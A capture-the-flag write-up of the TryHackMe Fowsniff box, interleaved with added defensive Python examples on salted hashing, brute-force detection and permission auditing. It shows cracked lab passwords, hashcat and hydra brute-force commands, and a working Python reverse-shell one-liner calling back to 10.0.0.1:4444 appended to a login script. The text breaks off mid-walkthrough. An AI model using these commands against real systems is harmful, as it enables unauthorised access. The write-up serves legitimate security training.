I just started using the TryHackMe platform to learn more about cybersecurity from both the Red and Blue team. Methodology can get stale at times, so let's solve a CTF!
You can find the Box on TryHackMe.
Information Gathering
A quick scan of the top 1000 ports using my custom nmap script revealed four services running on the server: SSH, HTTP, POP3, and IMAP. Let's start with the web server.
The main page mentioned their Twitter (@fowsniffcorp) being hacked. Other than that, nothing of value was to be found on the web server, even after looking for hidden directories and files using gobuster.
Looking at their Twitter, it's easy to notice it has been defaced quite badly by the attacker.
Lucky for me, however, the attacker leaked a bunch of MD5 password hashes in the process.
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
I cracked these hashes locally with hashcat, using the rockyou.txt wordlist.
hashcat -m 0 -a 0 hashes.txt /usr/share/dict/rockyou.txt
The result was this password and user list:
seina@fowsniff : scoobydoo2
parede@fowsniff : orlando12
tegel@fowsniff : apples01
baksteen@fowsniff : skyler22
mauer@fowsniff : mailcall
sciana@fowsniff : 07011972
mursten@fowsniff : carp4ever
mustikka@fowsniff : bilbo101
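Every one of the leaked values above is an unsalted MD5 digest, which is why a single hashcat run over rockyou.txt recovered most of them in seconds. The script below is an added example, not code from the writeup: it reproduces the weakness on constructed demo passwords (a precomputed dictionary of MD5 values is reused against every leaked hash at once) and then shows what the mail server should have stored instead, a salted memory-hard hash using scrypt from the Python standard library, where equal passwords no longer give equal hashes and every guess has to be recomputed per user. The password and wordlist values are constructed, not the ones cracked above.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed demo passwords; not the values recovered in the writeup.
DEMO_PASSWORDS = ["scoobydoo2", "apples01", "mailcall"]
# Constructed dictionary a defender might audit a leaked dump against.
DEMO_WORDLIST = ["password", "letmein", "apples01", "scoobydoo2", "dragon"]


def md5_hex(password: str) -> str:
    """Unsalted MD5 exactly as it appeared in the leaked dump."""
    return hashlib.md5(password.encode()).hexdigest()


def md5_dictionary_hits(md5_hashes, wordlist):
    """Hash the wordlist once, then look up every leaked hash in that table.
    With no salt, the cost of the attack does not grow with the number of users."""
    table = {md5_hex(word): word for word in wordlist}
    return {h: table[h] for h in md5_hashes if h in table}


def scrypt_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, memory-hard hash (scrypt, n=2**14, r=8 -> about 16 MiB per guess).
    Stored as 'scrypt$<salt hex>$<digest hex>' so the salt travels with the hash."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    return f"scrypt${salt.hex()}${digest.hex()}"


def scrypt_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, salt_hex, _ = stored.split("$")
    recomputed = scrypt_hash(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(recomputed, stored)


if __name__ == "__main__":
    leaked = [md5_hex(p) for p in DEMO_PASSWORDS]
    print("MD5 dictionary hits:", md5_dictionary_hits(leaked, DEMO_WORDLIST))
    # Same password hashed twice gives two different strings under scrypt.
    print(scrypt_hash("scoobydoo2"))
    print(scrypt_hash("scoobydoo2"))
```

The point for the defender is in the last two lines: the attacker's precomputed table is worthless against the scrypt output, and each of the nine accounts would have cost a separate, memory-bound search.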
User Access
A quick bruteforce attack on the POP3 service using the credentials I found gave me access to the mailbox of the user seina.
hydra -L users.txt -P passwords.txt pop3://10.10.192.198
I then used the very barebones telnet interface to connect to the mail server.
telnet 10.10.192.198 110
Trying 10.10.192.198...
Connected to 10.10.192.198.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
USER seina
+OK
PASS scoobydoo2
+OK Logged in.
LIST
+OK 2 messages:
1 1622
2 1280
Once connected to the POP3 server, I found an email mentioning that a new temporary SSH password S1ck3nBluff+secureshell had been set and should be changed ASAP.
I ran another bruteforce attack, this time on SSH, and found myself inside the server as the user baksteen.
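Both hydra runs above (POP3 first, then SSH) share a signature that is easy to catch on the server side: one source address fails against many different usernames in a short burst, and then one login succeeds from the same address. The detector below is an added example, not part of the writeup; it runs over constructed log lines that approximate Dovecot pop3-login and OpenSSH sshd syslog output (not captured from the box) and flags any source/service pair that fails at least min_failures times across at least min_users accounts inside a sliding window, reporting which accounts then authenticated successfully right after the burst.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines approximating Dovecot and OpenSSH syslog output.
# The attacker address 10.0.0.1 and the second client are made up.
SAMPLE_LOG = """\
Jun 30 17:01:02 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mauer>, method=PLAIN, rip=10.0.0.1, lip=10.10.192.198
Jun 30 17:01:03 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mustikka>, method=PLAIN, rip=10.0.0.1, lip=10.10.192.198
Jun 30 17:01:03 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<tegel>, method=PLAIN, rip=10.0.0.1, lip=10.10.192.198
Jun 30 17:01:04 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<baksteen>, method=PLAIN, rip=10.0.0.1, lip=10.10.192.198
Jun 30 17:01:05 fowsniff dovecot: pop3-login: Login: user=<seina>, method=PLAIN, rip=10.0.0.1, lip=10.10.192.198, mpid=1204
Jun 30 17:05:10 fowsniff sshd[1337]: Failed password for mauer from 10.0.0.1 port 51000 ssh2
Jun 30 17:05:11 fowsniff sshd[1338]: Failed password for tegel from 10.0.0.1 port 51001 ssh2
Jun 30 17:05:11 fowsniff sshd[1339]: Failed password for mustikka from 10.0.0.1 port 51002 ssh2
Jun 30 17:05:12 fowsniff sshd[1340]: Accepted password for baksteen from 10.0.0.1 port 51003 ssh2
Jun 30 17:30:00 fowsniff sshd[1400]: Failed password for parede from 192.168.1.20 port 40000 ssh2
Jun 30 17:30:05 fowsniff sshd[1401]: Accepted password for parede from 192.168.1.20 port 40001 ssh2
"""

TS = r"(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d)"
PATTERNS = [
    ("pop3", "fail", re.compile(TS + r" \S+ dovecot: pop3-login: Disconnected \(auth failed.*?user=<(?P<user>[^>]*)>.*?rip=(?P<ip>[\d.]+)")),
    ("pop3", "ok",   re.compile(TS + r" \S+ dovecot: pop3-login: Login: user=<(?P<user>[^>]*)>.*?rip=(?P<ip>[\d.]+)")),
    ("ssh",  "fail", re.compile(TS + r" \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")),
    ("ssh",  "ok",   re.compile(TS + r" \S+ sshd\[\d+\]: Accepted password for (?P<user>\S+) from (?P<ip>\S+)")),
]


def parse_line(line):
    """Return a normalised auth event, or None for lines we do not care about."""
    for service, outcome, pattern in PATTERNS:
        m = pattern.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # syslog has no year
            return {"ts": ts, "service": service, "outcome": outcome,
                    "user": m.group("user"), "ip": m.group("ip")}
    return None


def find_password_spraying(log_text, window=timedelta(seconds=60), min_failures=3, min_users=2):
    """One finding per (source IP, service) whose failures exceed the thresholds
    inside any sliding window; also lists accounts that logged in right after."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    by_source = defaultdict(list)
    for e in events:
        by_source[(e["ip"], e["service"])].append(e)

    findings = []
    for (ip, service), evs in by_source.items():
        fails = [e for e in evs if e["outcome"] == "fail"]
        for i, start in enumerate(fails):
            burst = [f for f in fails[i:] if f["ts"] - start["ts"] <= window]
            users = {f["user"] for f in burst}
            if len(burst) >= min_failures and len(users) >= min_users:
                end = burst[-1]["ts"]
                success_after = [e["user"] for e in evs
                                 if e["outcome"] == "ok" and end <= e["ts"] <= end + window]
                findings.append({"ip": ip, "service": service, "failures": len(burst),
                                 "users": sorted(users), "success_after": success_after})
                break  # one alert per source/service is enough
    return findings


if __name__ == "__main__":
    for finding in find_password_spraying(SAMPLE_LOG):
        print(finding)
```

A single failed login from 192.168.1.20 followed by a success is ordinary user behaviour and is not reported; the two bursts from 10.0.0.1 are, together with the accounts (seina, then baksteen) that the spray unlocked, which is exactly the list a responder needs for password resets.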
Privilege Escalation
After snooping around the system, I found a file /opt/cube/cube.sh responsible for displaying the fancy header we see on a successful SSH login. This file is particularly interesting as it is owned by the group users, which our compromised user is a member of.
> find / -group users -type f 2>/dev/null
...
-rw-rwxr-- 1 parede users 1296 Jun 30 16:56 /opt/cube/cube.sh
...
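The mode -rw-rwxr-- on a script that runs at every login is the whole vulnerability: anyone in the users group can rewrite it. The audit script below is an added example, not something from the writeup or the box; it parses ls -l / find -ls style lines (the first sample line is the one above, the other two are constructed) into permission bits, flags any file writable by group or other, and offers the same check against the live filesystem via os.stat for the usual login-hook directories. The fix on the box side would be chown root:root plus chmod 755 on the script.

```python
import os
import re
import stat

# Constructed listing: line 1 is the find output from the writeup, lines 2-3
# are made-up examples of a clean file and a world-writable one.
SAMPLE_LISTING = """\
-rw-rwxr-- 1 parede users 1296 Jun 30 16:56 /opt/cube/cube.sh
-rwxr-xr-x 1 root root 1100 Jun 30 16:56 /etc/update-motd.d/00-header
-rwxrwxrwx 1 root root 80 Jun 30 16:56 /etc/profile.d/banner.sh
"""

LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\S+\s+\S+\s+(?P<path>\S+)$"
)

# Directories whose contents are executed on login; assumed defaults, adjust per distro.
LOGIN_HOOK_DIRS = ["/etc/profile.d", "/etc/update-motd.d", "/opt/cube"]


def mode_from_string(mode_str):
    """Turn the 10-character ls mode (e.g. '-rw-rwxr--') into permission bits."""
    bits = 0
    for i, ch in enumerate(mode_str[1:10]):
        if ch in "rwxst":  # lowercase s/t mean the x bit is set as well
            bits |= 1 << (8 - i)
    return bits


def writable_by_non_owner(mode_bits):
    """Who besides the owner may modify the file."""
    who = []
    if mode_bits & stat.S_IWGRP:
        who.append("group")
    if mode_bits & stat.S_IWOTH:
        who.append("other")
    return who


def audit_listing(listing):
    """Audit ls -l style text; unparseable lines are skipped."""
    findings = []
    for line in listing.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue
        bits = mode_from_string(m.group("mode"))
        who = writable_by_non_owner(bits)
        findings.append({"path": m.group("path"), "owner": m.group("owner"),
                         "group": m.group("group"), "mode": oct(bits),
                         "writable_by": who, "risky": bool(who)})
    return findings


def audit_paths(paths):
    """Same check on the live filesystem; missing paths are skipped."""
    results = []
    for path in paths:
        try:
            st = os.stat(path)
        except OSError:
            continue
        bits = stat.S_IMODE(st.st_mode)
        who = writable_by_non_owner(bits)
        results.append({"path": path, "mode": oct(bits), "writable_by": who, "risky": bool(who)})
    return results


if __name__ == "__main__":
    for f in audit_listing(SAMPLE_LISTING):
        print(("RISKY " if f["risky"] else "ok    ") + f["path"], f["mode"], f["writable_by"])
    live = []
    for d in LOGIN_HOOK_DIRS:
        if os.path.isdir(d):
            live.extend(os.path.join(d, name) for name in os.listdir(d))
    for f in audit_paths(live):
        if f["risky"]:
            print("RISKY", f["path"], f["mode"], f["writable_by"])
```

Run as a cron job, the live check turns this class of misconfiguration into an alert before someone appends a payload; it only looks at mode bits, so a file that is writable because of an ACL still needs getfacl to catch it.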
I decided to add a reverse shell to the end of it and see with what privilege it is called.
I ended up going with this Python one:
export RHOST="10.0.0.1";export RPORT=4444;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
I set up a netcat listener with nc -lnvp 4444 and logged out of the shell.
On logging back in to the compromised account ...